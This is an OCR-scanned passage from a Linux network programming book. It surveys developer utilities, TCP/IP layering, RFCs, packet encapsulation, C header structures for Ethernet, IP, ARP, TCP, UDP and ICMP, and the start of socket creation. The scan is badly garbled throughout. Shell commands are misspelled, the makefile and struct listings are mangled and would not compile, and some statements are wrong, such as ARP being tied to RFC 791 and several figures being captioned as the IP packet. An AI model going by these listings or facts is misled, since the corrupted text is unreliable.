situations they are indispensable. Therefore, you must be aware of their existence and have at 
least general knowledge of their operation. All utilities described in the chapter are, as a rule, 
included in any standard Linux distribution. Many of them are also included into the GNU 
binutils package, which is a fundamental part of any Linux system. The home page of the binutils 
package’s developers can be found at this address: http://sources.redhat.com/binutils/. 
This chapter gives only a general review for each utility. For detailed information, consult 
the corresponding man. 


2.1. Time 


The time utility runs the specified program. When the program finishes, the utility prints the 
timing statistics for the program run, for example: 

# time ./your prog 

real Om0.,008s 

user Om0.001s 

sys 0m0.010s 

Here, real is the elapsed real time between program start and program termination, and 
user and sys are, respectively, the user and the system central processing unit times in min- 
utes (m) and seconds (s) taken by the program execution. You can trace the execution time of 
a program that uses multiple command line arguments, channels, or both by running the 
time utility in this way: 


# time /bin/sh -c "your prog -flags|my prog" 
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2.2. Gprof 

The gprof utility is a profiler. You use a profiler to pinpoint excessive program function 
calls and functions that consume more than their fair share of computation resources — 
that is, to locate bottlenecks in programs. The utility is easy to use. First, a program with 
profile options is compiled and linked. (For the GCC, the -pg option must be specified.) 
When this program is executed, profile information is generated, which is stored in the 
gmon.out file. The program must be free of bugs, because no profile is generated if a pro- 
gram terminates abnormally. Finally, gproof is run with the name of the executable file to 
profile specified in the argument. 

The gprof utility analyzes the gmon.out file and produces execution time information 
for each function. In general, this information is output as two tables: flat profile and call 
graph, with brief remarks explaining their contents. The flat profile table shows the execu- 
tion time and the number of calls for each function. This information makes it easy to pin- 
point functions with the longest execution times. The call graph table aids in determining 
the areas, in which you may try to eliminate calls to time-hungry functions. For each func- 
tion, the table shows information about calling and called functions and the corresponding 
number of calls. It also contains information about the time spent executing subroutines in 
each function. 

Executing gprof with the -A option outputs the program's source code annotated 
with execution time percentages. It only makes sense to profile large programs with nu- 
merous function calls. The following is an example of a command sequence for profiling 
a program: 

# gcc -pg -o your prog your prog.c 


# ./your prog 
# gproft ./your_prog 


2.3. Ctags 


Sometimes, a program can consist of numerous modules saved in different source files. 
Locating, for example, the definition of a certain function becomes like looking for a needle 
in a haystack. Making this task manageable is the purpose of the ctags utility. The utility 
processes the source files and generates an information file named tags. The contents of 
the tags file are organized in three columns: The first column lists function names, the 
second column lists the corresponding source files, and the third columns gives a template 
for searching for the function in the file system using such utilities as find. The following 
is an example of a file contents: 

main /usr/src/you_ prog.c /*main()$/ 

funcl /usr/src/you prog.c /*funcl (argl,argz)5/ 

func2 /usr/src/you prog.c /*func2 (argl,arg2)$/ 

And this is an example of executing the ctags utility: 


# ctags *.c 
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2.4. Strace 


The strace utility traces all system calls and signals for the specified program. The utility is 
run as follows: 

# strace ./your prog 

Each line of the output produced shows information for one system call: the name of the 
system call and its arguments, followed by the returned value after an equal sign (=). The fol- 
lowing is an example of a line output by st race: 

execve("./your prog", ["./your_ prog”), [/* 27 vars */]) = 0 

Here, [/* 27 vars */] denotes a list of 27 environmental variables, which strace did not 
show so as not to clutter the output. 

Running strace with the -f option traces all child processes as they are created by traced 
processes. 


2.5. Ltrace 


The ltrace utility is similar to strace, but it traces calls to dynamic libraries. 


2.6. Mtrace 


The mt race utility is used to trace the use of dynamic memory by a program. It keeps track of 
memory allocation and de-allocation operations; that is, it traces memory leaks. Memory leaks 
gradually reduce available system resources until they are exhausted. To pin down all potential 
memory leak areas in your program, you will have to perform the following sequence of steps: 
First, include the mcheck.h file in the program and place an mtrace() function call at the start 
of the program. Then, specify the name of the file, in which the memory checking results 
should be stored, by exporting the name into an environmental variable, as in the following 
example: 

+ export MALLOC TRACE=mem. log 

Running the program now will register all memory allocating and freeing operations in 
the mem.log file. Finally, the mt race utility i is called as follows: 

# mirace you_prog SMALLOC TRACE 


The produced information is examined for records, in which memory was allocated but 
not freed. For the described procedure to succeed, the program under investigation must ter- 
minate normally. 


2.7. Make/gmake 


Changing any file in a multifile project inevitably entails recompiling the rest of the files. 
The make utility (called gmake in some distributions) is intended to take the sweat out of 
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this task. To use the make utility, you must prepare a text file, called a makefile, in which the 
relationships among the files in your program and the build rules are laid out. The rules are 
recorded in the following format: 
<target>: <prerequisite> 
<command> 
command > 


The first target in the makefile is executed by default when make is run without arguments. 
It is customarily called al1, which is equivalent to the make all command. The following is an 
example of a makefile: 

all: your prog 


your prog: your prog.o foo.o boo.o 
gcc your _prog.o foo.o boo.o -o your_prog 


your prog.o: your prog.c your prog.h 
foo;o0: foo.c foovh 
boo.o: boo.c boo.h 


clean: 
rm -f£ *.o you prog 
The clean command deletes all existing object files and programs so that make can create 
them anew. To build a project, all you have to do is to enter the following in the command line: 


# make 


2.8. Automake/autoconf 


There is an easier way of preparing makefiles, namely, using the automake and autoconf 
utilities. First, prepare the makefile.am file — for example, like this: 

bin PROGRAMS = your prog 

you prog SOURCES = your prog.c foo.c boo.c 

AUTOMAKE OPTIONS = foreign 

The last option specifies that the standard documentation files (mews, readme, authors, 
and changelog) are not to be included in the project even though the standard mandates that 
all GNU packages include them. 

Next, the configure.in file needs to be created. This can be done using the autoscan utility. 
This utility scans the source files tree, whose root is specified in the command line or is the 
same as the current folder, and creates the configure.scan file. This file is inspected, corrected 
as necessary, and then renamed as configure.in. The last step is running the following utilities 
in the order shown here: 

# aclocal 

fF autoconf 

# automake -a -c 
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The result will create the configure and makefile.in scripts and documentation files 
in the current directory. Now, to build a project, all you have to do is to enter the following 
commands in the command line: 


# ./configure 


# make 


2.9. Ldd 


The ldd utility displays all shared libraries required by each program. The following is an 
example of starting It: 


# ldd ./your prog 


2.10. Objdump 


The objdump utility displays information about one or more object files; the particular infor- 
mation to display is specified by options. For example, the -D option prints a disassembly of 
the specified program; the -x option prints all program headers, including file and section 
headers; the -s option shows the contents of all sections; and the -R option lists dynamically 
moved data. The following is an example of starting the utility: 


fF objdump -D ./your prog 


2.11. Hexdump and od 


The hexdump utiltty displays the contents of the specified file in the decimal (-d), hexadecimal 
(-x), octal (-b) and American Standard Code for Information Interchange, or ASCII (-c), 
modes. The following is an example of running the utility: 

# hexdump -c ./your prog 

The ed utility is analogous to the hexdump utility: 

food -c ./your prog 


2.12. Strings 


The strings utility displays strings of printable ASCII characters in a file longer than four 
characters (the default setting). The following is an example of running the utility: 


# strings ./your prog 


2.13. Readelf 


The readelf utility displays information about executable and linkable format (ELF) files, such as 
file and section header and other structures. (See Chapter 15 for a detailed discussion of ELF files.) 
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2.14. Size 


The size utility displays section sizes in each of the specified files. By default, the size of only 
the command (.text), data (.data), and uninitialized data (.bss) sections and the total size 
of these sections are listed in the decimal and hexadecimal format. To list the sizes of all sec- 
tions in the file, the -A flag is used. The following is an example of running the utility: 


# size ,/your_prog 


2.15. Nm 


The nm utility outputs to the standard device a table of symbols for each file specified in the 
argument list. Symbol tables are used to debug applications. The utility displays the name 
of each symbol and information about its type: a data symbol (a variable), a program symbol 
(a label or a function name), and so on. The following is an example of running the utility: 


f#onm ./your prog 


2.16. Strip 


When a program has been debugged, the symbol table can be deleted from it. This is accom- 
plished using the strip utility: 


# strip ./your prog 


2.17. File 


The file utility performs a series of tests on each of the specified files in an attempt to classify it. 
With text files, the utility tries to determine the programming language by the first 512 bytes. 
For executable files, the utility displays information about the platform, version, and structure 
of the file’s libraries. The following are two examples of running the file utility: 

# file /bin/cat 

/bin/cat: ELF 32-bit LSB executable, Intel 80386, version 1, dynamically linked (uses 

shared libs), stripped 

fF iile ./cade.c 

-f/code,c: ASCII C program text, with CRLF, CR, LF line terminators 

When the file utility is executed, it must be told the path that will reach the file to test. 
The path can be specified either explicitly or implicitly by using the which command and the 
file name enclosed in accent-grave marks (*). The following is an example of specifying the 
file path implicitly: 

# file which as 

f/usr/bin/as: ELF 32-bit LSB executable, Intel 803586, version 1, dynamically linked 

(uses shared libs), stripped 
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2.18. Ipcs and ipcrm 


The ipcs and iperm utilities may come in handy if there are interprocess communications in 
your program. Executing the ipcs utility with the -m option displays information about 
shared segments: 

# ipes -m 

The -s option shows information about semaphore arrays. The iperm utility is used to 
remove a shared memory segment or a semaphore array. For example, the following com- 
mand removes the segment with the identifier 2345097: 

# ipcrm shm 2345097 

For the ipcs and ipcrm utilities to work, the following options must be enabled in the 
kernel: 


[] sysvmMsc — System V message support 





O sysvse=mM — System V semaphore support 
O sysvsum — System V shared memory support 


2.19. Ar and ranlib 


The ar archiver, which comes in the binutils package, can be used for creating static libraries. 
The following is an example of running the utility: 

# ar cr libmy.a filel.o filez.o 

The cr flags specify that an archive should be created. Other flags are used for extract- 
ing from or modifying an archive (run man ar for more details). A static library is linked to 
a program using gce or g++ with the -L flag, which specifies the folder, in which to look for 
the library. The -L. flag (with a period) specifies that the library is located in the current 
directory. Then all necessary libraries are listed using the -1 switch, followed by the library 
name without the 1ib prefix and the .a ending. That is, in the given case, the command 
will look as follows: 

# gcc -o your prog.c -L. -lmy -o your prog 

While this method of obtaining a static library works in most cases, it does not work on 
some systems because a symbol table (1.e., a list of the library's functions and variables) has to 
be added to the archive created by the ar utility for the linking process to succeed. This is done 
using the standard ranlib utility from the binutils package: 

f ranlib libmy.a 

Now the library can be linked to a program, using gcc as shown in the previous example. 
It is recommended that you always process archives using the ranlib utility when creating 
a static library. 
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2.20. Arp 


The arp utility is used to view and manipulate the system ARP cache. 

The -a option outputs the entire contents of the ARP cache in the BSD style, and the 
-e option does this in the Linux style: 

f arp -e 

The -d option is used to clear the entry for the specified host: 

f# arp -d IP address 

The entry, however, is not deleted from the cache; the hardware address field (HWaddress) 
is simply cleared. 

A mapping entry from the host to the hardware address can be added to the ARP cache 
using the -s option as follows: 

# arp -S IP address MAC address 
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Many network war utilities require direct access to network packet header fields. Therefore, 
you should know how network packets are formed, the general structure of the main packet 
types, and the specifics of working with them. I assume that you followed my recommenda- 
tion and familiarized yourself with the literature suggested in the introduction. In this chapter, 
therefore, | only give general information to refresh your knowledge and some information 
that cannot be readily found in programming textbooks. 


3.1. TCP/IP Stack 


All network utilities considered in this book use only the TCP/IP stack, because this is the 
main protocol stack used in local and wide area networks, including the Internet. Moreover, 
only the Internet protocol version 4 (IPv4) is considered because even though Internet protocol 
version 6 (IPv6) is gradually being implemented in some countries, it still has a long way to go 
to become widely used. Thus, considering I[Pv6 would only needlessly complicate the source 
codes of the example programs without delivering any tangible benefits. 

TCP/IP is a suite of network protocols oriented toward joint use. The core protocols in 
this suite are the following: 


O The Internet protocol (IP) is responsible for transferring data, called datagrams, from one 
node to another, with each host uniquely identified by an IP address. Thus, IP is responsible 
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for addressing over the entire network using IP addresses, because IP addresses are used 
only in the headers of IP datagrams. IP is an unreliable, connectionless protocol. This 
means that each datagram is sent over the network independently of the others and, ac- 
cordingly, there is no guarantee of any of the datagrams arriving to their destination or of 
the datagrams arriving in the original sequence. [Pv4 is described in request for comment 
(RFC) 791. 

O The Internet control message protocol (ICMP) is responsible for providing different low- 
level support services for IP, such as sending messages about problems with routing IP 
datagrams. ICMP is defined in RFC 792, with additional information provided in RFC 950 
and RFC 1256. 

O The address resolution protocol (ARP) is responsible for mapping the IP address of a node 
to its hardware (MAC) address. ARP is defined in RFC 791. There is also the reverse ad- 
dress resolution protocol (RARP), which resolves a MAC address to an IP address. RARP 
is defined in RFC 903. 

© The transmission control protocol (TCP) is a reliable connection-oriented protocol. That 
is, this protocol provides guaranteed delivery of data packets and supports virtual connec- 
tions by using a system of acknowledgments and packet retransmission when necessary. 
TCP is defined in RFC 793, with amendments given in RFC 1072 and RFC 1146. 

O The user datagram protocol (UDP) provides simple, unreliable datagram communica- 
tions service to specific applications on the specified node. UDP is defined in RFC 768. 


The described protocols can be considered the fundamental protocols, because they form 
the basis for the TCP/IP network operation. 

Connection-oriented protocols (e.g., TCP) are typically called stream protocols; connec- 
tionless protocols (e.g., IP, UDP, ICMP, ARP, and RARP) are called datagram protocols. 

Other protocol stacks use their own network protocol suites. For example, the IPX/SPX 
stack from Novel is a suite of protocols consisting of NLSP, IPX, SPX, NCP, SAP, and others. 
An individual protocol does not necessarily have to belong to a single protocol stack. Practi- 
cally all application and channel layer protocols belong to the TCP/IP stack only by conven- 
tion, because they can and do work in other protocol stacks. 

The TCP/IP stack is based on a multilayer protocol interaction scheme. TCP/IP protocols 
map to a four-layer conceptual model: the application layer, the transport layer, the internet 
layer, and the network interface layer. 

The International Standards Organization (ISO) proposed its own universal protocol 
stack model, called the open systems interconnection (OSI) reference model. This model, 
however, is not used and only serves as a standard for classifying and comparing protocol 
stacks. Figure 3.1 shows the approximate mapping of the layers of the TCP/IP stack, with 
some of their protocols, to the OSI model. 

In the ensuing material, protocol layers are mentioned without specifying whether they 
pertain to the OSI model of the TCP/IP stack. You should be able to figure it out yourself, and 
Fig. 3.1 is intended to help you in this task. 
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OSI model standard Protocols TCPIP stack 


Application layer HTTP, FTP, Telnet, SMTP, 
Presentation layer SSL. SSH. SNMP Application layer 


Transport layer TCP, UDP Host-to-host transport layer | 
IP, ICMP. IGMP. RIP, ARP. 
Network layer | RARP. OSPF Internet layer 
Nata link la Ethernet, FODI, ATM, PPP, 
— Network interface layer 
Physical layer 


Fig. 3.1. Approximate mapping of the TCP/IP stack layers to the OSI model 





3.2. RFC as the Main Source of Information 


The standards of protocols in the TCP/IP stack and the related internal workings of the Inter- 
net are published in a series of uniquely numbered documents, or RFCs. The original RFCs 
are never updated; if changes are required, they are published in a new RFC. 

RFCs are divided into the following subsets: 


O Standard (STD) documents publish Internet protocols that have undergone the Internet 
Engineering Task Force examination and testing procedure and have been officially ac- 
cepted as standards. 

O For Your Information (FYI) documents are introductory and informational materials in- 
tended for the general public. 

O) Best Current Practice (BCP) documents describe accepted procedures and recommenda- 
tions concerning using Internet technologies. 


Each of the listed series has its own document numbering order. Often, the same docu- 
ment can be included in different series under different numbers. For example, RFC 3066, 
“Tags for the Identification of Languages,” is also known as BCP 47. 

You can obtain RFCs from different sources, the easiest being from _ the 
http://www.faqs.org/rfcs/ or the http://www.rfc-editor.org site. The latter resource is a clearing 
house for RFC documents. Both sites offer an easy-to-use facility for searching the contents by 
keywords, which is handy if you don’t know the number of the RFC you need. You can also 
download the complete RFC index from them. 
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3.3. Packets and Encapsulation 


Data are sent over the network as packets, whose maximum size is determined by the data link 
layer. Each packet is made from a header and a payload, or simply data. The header contains 
different service data, for example, the packet’s source and destination. The payload is the data 
that have to be transmitted. 

Blocks of transferred data are named differently depending on the specific TCP/IP stack 
layer and on whether a datagram or stream protocol is considered (see Fig. 3.2). 


Stream protocols Datagram protocols 
(TCP) (IP, UDP, ICMP) 


Network interface layer 








Fig. 3.2. Terms used to denote a data block at different TCP/IP stack layers 


TCPIIP stack 





GET / HTTP/1. finn 
Application layer Host: www.example.com\rin\rin | 


Host-to-host 

transport layer 

Intemel layer A : | 
Network interface layer Ethernet | 


To the network 
Fig. 3.3. Forming a network packet in the TCP/IP stack 


Chapter 3: Introduction to Network Programming 35 


In this book, I mostly use the universal term “packet.” 

A packet is built from the topmost layer and proceeding down the protocol stack. Each 
layer adds its own header to the packet. Thus, a packet, consisting of the payload and the 
header, of a previous layer becomes the payload in the packet in the next layer. This process is 
called encapsulation. After a packet is completed, it is sent by the physical layer to the destina- 
tion node, where the encapsulated data are disassembled in reverse order. 

Consider a specific example (see Fig. 3.3). 

A user who wants to view, for example, the http://www.example.com page on the Inter- 
net enters this address into the browser’s address window and presses the <Enter> key. Be- 
cause the hypertext transfer protocol (HTTP; HTTPv1.1 is defined in RFC 2068) is responsible 
for interaction and information exchange between the server and the Web browser, according 
to the specification of this protocol the Web browser forms the following request: 

GET / HTTP/1.1\r\n 

Host: www.example.com\r\n\r\n 

(A browser will usually include more data in a request, but to keep things simple I show 
only the essential data. ) 

This data block is passed to the transport layer. According to RFC 2068, HTTP requires 
reliable data transmission; therefore, a TCP header is added to the data block at the transport 
layer. The TCP header specifies the destination port number (usually, port 80), the source 
port number, and other information. The detailed structure of the TCP header and of other 
headers is considered in Section 3.4. The transport layer passes the packet to the internet layer, 
which adds its own, IP, header to it. The header contains the source and the destination IP 
addresses, as well as other information. If the server’s domain name (i.e., www.example.com) 
cannot be resolved to the corresponding IP address using the local computer's resources, the 
IP module will do this by making a request to a DNS server. From the internet layer, the 
packet is sent to the network access layer. The type of header added at this layer depends on 
the network type. An Ethernet header is added for an Ethernet local network (as is the case in 
the example), an FDDI header is added for a fiber distributed data interface network, a PPP 
header is added for a modem point-to-point connection, and so on. 

The Ethernet header contains the source and the destination hardware, or MAC, ad- 
dresses. The destination MAC address is determined by searching in the ARP cache of the local 
computer. If the MAC address is not found in the local ARP cache, an ARP request is formed 
for searching for the destination MAC address by the destination IP address. 

When a packet it completely assembled, it is sent on the network. Because en route 
a packet may be passed among different networks, its data link layer header may be changed 
by the transit routers. Moreover, a packet may be fragmented into smaller packets if the net- 
work limitations make transmitting the complete packet impossible. 

When a packet arrives at the server, the preceding sequence of operations is repeated by 
the TCP/IP stack of the server but in reverse order. First, the data link layer header is exam- 
ined and, if the hardware address is correct, the data link layer header is removed. The rest of 
the packet is sent to the internet layer. The internet layer checks the IP address, the checksum, 
and the other data. If all checks are successful, it removes the IP header and passes the rest of 
the packet to the transport layer. The transport layer checks the destination port, the checksum, 
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and the other TCP-header fields; if all checks are successful, the TCP header is removed and 
the remaining part of the packet is passed to the application layer to the Web server. The Web 
server examines the HTTP request and prepares an HTTP answer. The answer will be either 
the requested page or an error message if the page cannot be found. Then the answer goes 
through the TCP/IP stack of the server analogously to the request going through the TCP/IP 
stack of the client. 


3.4. Network Packet Header Structures 


To be able to work with network packet header fields, a program must have the necessary 
structures defined. Linux stores structure definitions of all main network packets in individual 
header files, which can be included in a program as necessary. What is more, a separate set of 
these header files is stored in two different directories. The first directory is /usr/include/linux 
and is used in Linux system only. The other directory is /usr/include/netinet and is used in 
practically all UNIX varieties. Some header files for UNIX systems are also stored in the 
/usr/include/net directory. 

The following are some examples of including header files from the /linux directory: 

#include <linux/ip.h> 

finclude <linux/tcp.h> 

#include <linux/udp.h> 

#include <linux/icmp.h> 

#include <linux/if ether.h> 

And these are some examples of including header files from the /netinet and /net directories: 

#include <netinet/ip.h> 

#include <netinet/tep.h> 

#include <netinet/udp.h> 

#include <netinet/ip icmp.h> 

finclude <net/ethernet .h> 

The names of the header files are descriptive of their function. For example, the udp.h file 
contains definition of the UDP header structure, the if_ether.h and ethernet.h files contain 
definitions of the Ethernet header structures, and the ip_icmp.h and icmp.h files contain defi- 
nitions of the ICMP header structures. 

The structures in the header files in these two directories are basically the same, the only 
difference being sometimes different structure field names. Also, from my experience I can 
conclude that the structures in the /usr/include/linux directory are more up-to-date and re- 
flect the latest innovations in the network protocols. For example, the TCP header structure in 
the /linux/tcp.h header file has the fields for the ECE and CwR experimental flags (see RFC 3168), 
whereas these fields are missing in the analogous structure in the /netinet/tcp.h header file. 
Therefore, if your program must be compatible with various UNIX versions, you should 
use the header files from the /usr/include/netinet and the /usr/include/net directories. 
If only Linux compatibility and modern structures are needed, the header files from the 
/usr/include/linux directory should be used. 
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You can also intermix header files from these directories, but take care that structure defi- 
nitions do not overlap. 

There is even a better way than including the standard header files into a program, and it 
is practiced by many programmers: You don’t include structures from the standard header 
files but instead define your own network packet structures in your program. This can be 
done by simply copying the necessary structures from the standard header files and modifying 
the field names in the resulting structures if so desired. Custom structures can also be stored 
in a custom header file, which is then included in your program. This method provides com- 
plete portability, because it eliminates the dependency on the system header files. It also has 
a small drawback: It is quite tedious, especially if you have to define a good number of struc- 
tures In a program. 

For this book, | first wanted to use a unified approach, that is, to include only structures 
from one of the standard directories in all programs that work with packet header fields, 
namely, /usr/include/netinet. Having thought the matter over a bit, however, I decided against 
this and to favor a mixed approach. So the source codes in this book contain header files from 
both the /usr/include/linux and the /usr/include/netinet directories, as well as custom struc- 
ture definitions. 

The following subsections give short descriptions of the main network packet formats. 
Also, header structure definitions for network packets are given, which you can use in your 
programs as your own custom structures. No field descriptions are given; you can learn those 
in the corresponding RFCs. Only some specific information necessary for programming is 
provided. 

The header structures are based on the structures in the header files in the /usr/include/linux 
directory but are not their exact copies. 


3.4.1. Ethernet Header 


Figure 3.4 shows the format of the Ethernet packet, and Listing 3.1 shows the definition of the 
Ethernet header structure. 


Destination hardware address 


B: os) 





Fig. 3.4. The Ethernet packet format 








Listing 3.1. The Ethernet header structure definition 





struct ethhdr 

{ 
unsigned char h_dest([ETH_ALEN]; /* Destination hardware address */ 
unsigned char h source[ETH ALEN]; /* Source hardware address */ 
unsigned short h proto; /* Packet type */ 

be 
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The following are some constants and definitions taken from the /linux/if_ether.h header 
file, which you can use in your programs: 
#define ETH ALEN 6 /* Number of bytes in the hardware address */ 


/* Value for the "Packet Type" field */ 

fdefine ETH PIP Ox0800 /* IP packet */ 

#Hdefine ETH_P X25 Ox0805 /* X.25 packet */ 

#define ETH P ARP Ox0806 /* ARP packet */ 

fdefine ETH_P_RARP 0x8035 /* RARP packet */ 

#define ETH P ALL 0x0003 /* Any packet (Be careful with these) */ 


3.4.2. IP Header 


Figure 3.5 shows the format of the IP packet, and Listing 3.2 shows the definition of the IP 
header structure. 


Header 
length 


(4 bits) 


Version 
(4 bits) 


Type of service Total length 
(8 bits) (16 bits) 


Packet identifier Fragment offset | 
(16 bits) (13 bits) | 
Time to live Protocol Header checksum 
(8 bits) (8 bits) (16 bits) 


source IP address 
(32 bits) 
Destination IP address 
(32 bits) 
Options and padding 
(Up to 40 bytes) 





Fig. 3.5. The IP packet format 





Listing 3.2. The IP header structure definition 





typedef unsigned char _u&; 
typedef unsigned short  ul6; 
typedef unsigned int __u32; 


struct iphdr { 
_u8 ahi, /* Header's length in 2-byte words */ 
version:4; /* Version */ 


tos; 

tot len; 
ids 

frag off; 
ttl; 
protocol; 
check; 
saddr? 
daddr; 
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Service type */ 

Total packet length in bytes */ 
Packet identifier */ 

Flags and the fragment offset */ 
Time to live */ 

Protecol */ 

Checksum *,/ 

source IP address */ 

Destination IP address */ 





Individual flags in the IP header, located in the frag off field of the structure, can be 
accessed with the help of a bit operation on this field and the following macro definitions: 


#define 
fdefine 
Adefine 
Fdefine 


IP_RF 0x8000 
IP DF 0x4000 
IP MF 0x2000 
IP OFFMASK Oxlfft 


/* Reserved (set to 0) */ 

/* Fragmentation prohibited */ 

/* More fragments following */ 

/* Mask for the "Fragment Offset" field */ 


The following are some constants and definitions taken from the /netinet/in.h header file, 
which you can use in your programs: 


/* Values for the 


enum 
IPPROTO IP 


#aefine IPPROTO IGMP 


IPPROTO TCP 


fdefine IPPROTO TCP 


TPPROTO_EGP 


#define IPPROTO EGP 
IPPROTO_UDP = 17, 

#define IPPROTO_UDP 
IPPROTO_RAW = 255, 

fdefine IPPROTO_RAW 


}? 


OQ, 

#idefine IPPROTO IP 
IPPROTO ICMP = 1, 

#define IPPROTO_ICMP 
IPPROTO IGMP = 2, 


"Protocol" field */ 


/* Dummy protecol for TCP */ 
IPPROTO IP 
ICMP */ 
IPPROTO ICMP 
IGMP */ 
IPPROTO IGMP 
TCP. 
IPPROTO TCP 
Exterior gateway protocol */ 
IPPROTO EGP 
UDP */ 
IPPROTO UDP 
Raw IP packets */ 
IPPROTO RAW 


js 
js 
6, * 
8 ff 
ps 


i* 


3.4.3. ARP Header 
Figure 3.6 shows the format of the IP packet, and Listing 3.3 shows the definition of the IP 


header structure. 





Listing 3.3. The ARP header structure definition 





struct arphdr 
{ 


unsigned short ar_hrd; 


/* Equipment type */ 


40 


unsigned 
unsigned 
unsigned 
unsigned 
unsigned 
unsigned 
unsigned 
unsigned 
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short 
char 
char 
shert 
char 
char 
char 
char 


ar pro; yF 
ar hin; /* 
ar pln; /* 
ar op; Bal 
ar_sha{ETH_ALEN]; /* 
ar sip[4]; im 
ar tha[ETH ALEN]; /* 
ar tip[4]; {* 


Protocol type */ 

Hardware address length */ 
Protocol address length */ 
Operation code */ 

Source hardware address */ 
Source IP address */ 
Destination hardware address */ 
Destination IP address */ 





Equipment type 
(16 bits) 


| Protocol type 
| (16 bits) 


P-len Operation code 
(8 bits) (16 bits) 


Source hardware address 


(32 bits) 


Destination hardware address 


(32 bits) 


Destination protocol address 





(32 bits) 





Fig. 3.6. The format of the ARP packet 


The following are some constants and definitions taken from the /linux/if_arp.h header 
file, which you can use in your programs: 

/* Value for the "Packet Type” field */ 

#define ARPHRD ETHER 1 

#define ARPHRD ARCNET 7 

#define ARPHRD ATM 19 

idefine ARPHRD_X25 271 

idefine ARPHRD PPP 512 


/* Values for the "Operation Type" 


fidefine ARPOP REQUEST 1 
fdefine ARPOP_REPLY 2 
fidefine ARPOP_RREQUEST 3 
fdefine ARPOP RREPLY 4 


The format of the RARP packet and the structure of the RARP header are virtually identical 
to those of the ARP packet, the only difference being the value of the Operation Code field. 


/* Ethernet 10 Mbps */ 
/* ARCnet */ 

/* ATM */ 

f* CITT Rize tS 


field */ 

/* ARP request */ 
/* ARP reply */ 

/* RARP request */ 
/* RARP reply */ 
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Note the following important point. In the definitions of the ARP header structures in 
the header files, the last four fields are enclosed between the #if 0 and #endif preprocessor 
instructions; that is, access to these fields is prohibited. This is the case for both /linux/if_arp.h 
and /net/if_arp.h. Therefore, using these fields in a program will generate a compiler error. 
The only way to use these fields is to define your own ARP header structure. The easiest way of 
doing this is to simply copy the source code from Listing 3.3. 


3.4.4. TCP Header 


Figure 3.7 shows the format of the IP packet, and Listing 3.4 shows the definition of the 
IP header structure. 


2 


+ i —_— - —_- 
a Oa ‘ E ’ » a” = 1 
“s = 4 leew i i 
* i ‘ al =r : 
| 7 . = ‘ - Wi tei te ey, i -¥ 
me ah an | ie Pa) ie. ’ 4 


Source port Destination port 
(16 bits) (16 bits) 


Sequence number 
(32 bits) 


Acknowledgment number 
(32 bits) 


Reserved Window size 
(4 bits) | _ | (16 bits) 


Urgent data indicator 
(16 bits) 





Parameters and alignment 


Fig. 3.7. The format of the TCP packet 





Listing 3.4. The TCP header structure definition 


typedef unsigned short __ul6; 
typedef unsigned int 32; 


Struct tephdr |{ 

_ul6 source; /* Source port number */ 
_ul6 dest; /* Destination port number */ 
_u32 seq? /* Sequence number */ 

_u32 ack_seq; /* Acknowledgment number */ 
_ul6 resl:4, /* Reserved */ 
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doftt:4, /* Data offset */ 


Ein:l, /* Close the connection */ 

synil, /* Request to establish a connection */ 

ESES 1; /* Break the connection */ 

pshil, /* Immediately send a message to the process */ 


ack:l, /* Enabling the acknowledgment number field */ 
urg:l, /* Enabling the urgency pointer field */ 
ece:l, /* Experimental flag(RFC3168) */ 
cwr:1; /* Experimental flag(RFC3168) */ 

__ul6é window; /* Window size */ 

__ulé check; /* Checksum */ 

__ulé urg ptr; /* Last byte of an urgent message */ 

}F 





3.4.5. UDP Header 


Figure 3.8 shows the format of the UDP packet, and Listing 3.5 shows the definition of the 
IP header structure. 


Destination port 
(16 bits) 
Checksum 


(16 bits) 





Listing 3.5. The UDP header structure definition 





typedef unsigned short _ul6; 


struct udphdr | 
__ul6 source; /* Source port number */ 
__ul6é dest; /* Destination port number */ 
__ul6 len; /* Message length */ 
__ulé check; /* Checksum */ 

he 





3.4.6. ICMP Header 


Figure 3.9 shows the format of the ICMP packet, and Listing 3.6 shows the definition of the 
ICMP header structure. 
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Identifier 
(16 bits) 


Fig. 3.9. The format of the ICMP packet 


Type tit” Code Checksum 
(8 bits) (8 bits) (16 bits) 


Sequence number 
(16 bits) 





Listing 3.6. The ICMP header structure definition 





typedef unsigned char _u&; 
typedef unsigned short __ul6; 
typedef unsigned int u32; 


struct icmphdr { 


__ us type; /* Message type */ 
__ué code; /* Message code */ 
__ul6é checksum; /* Checksum */ 
union { 
struct { 
_ul6 id; /* Identifier */ 
__ul6 sequence; /* Sequence number */ 
} echo; 
__u32 gateway: 
struct { 
_ul6é —_ unused; 
__ul6 mtu; 
} frag; 
} un; 
}? 





The following are some constants and definitions taken from the /linux/icmp.h header 
file, which you can use in your programs: 


/* The value for the “Message Type" field */ 


#define 
#define 
#define 
#define 
#define 
#define 


ICMP ECHOREPLY ao 
ICMP DEST UNREACH 3 /* 
ICMP SOURCE QUENCH 4 /* 
ICMP REDIRECT a+ ¢* 
ICMP ECHO gf 
ICMP TIME EXCEEDED 11 /* 


Echo reply */ 

Destination unreachable */ 
Source quench */ 

Redirect (change route) */ 
Echo request */ 

Time exceeded */ 


Table 3.1 lists the main types of ICMP messages. 
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Table 3.1. ICMP neages 


Destination unreachable, because: 
Net is unreachable. 

Host is unreachable. 

Protocol is unreachable. 

Port is unreachable. 


Fragmentation is needed and DF = 1. Sent by an IP router when a packet must be 
fragmented but fragmentation is not allowed. 


Source route failed. 


Source quench. Informs a sending host that its IP datagrams are being drooped because 
of congestion at the router to make it lower its transmission rate. 


Redirect. Informs a sending host of a better route to a destination IP address to: 
The given network 

The given host 

The given network with the given Type of Service (TOS) 

The given host with the given TOS 


Echo requ uest 


Router advertisement 
Router solicitation 
| Time exceeded during the following: 
_ Transmission 
_ Assembly 
| Parameter problem: 
IP header error 
A necessary option is missing 


request 


fo" Address mask request 
| 18 | o | Address mask reply 
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3.5. Sockets 


Sockets in a program are created using the socket () function. The following ts its prototype: 
int socket (int domain, int type, int protocol); 


This function does not simply create a socket but also enables access to the protocols of 
a certain TCP/IP stack layer. Depending on the specific layer, sockets are given different names. 


3.5.1. Transport Layer: Stream and Datagram Sockets 


To obtain access to the transport layer, the SocK STREAM constant (for TCP) or the 
SOCK _DGRAM constant (for UDP) must be specified as the type argument for the socket () 
function. Accordingly, the created sockets are called stream and datagram sockets. Values like 
PF UNIX or PF LOCAL for local connections, PF INET for [Pv4 family protocols, PF INET6 for 
IPv6 family protocols, and pF 1Px for Novell protocols can be specified as the domain argu- 
ment in the secket () function. 

I only consider operations with the PF INET domain. Only 0 can be specified as the pro- 
tocol argument for datagram and stream sockets. The following are examples of creating 
a stream and a datagram socket: 


sd = socket (PF INET, SOCK STREAM, 0); /* Stream socket */ 


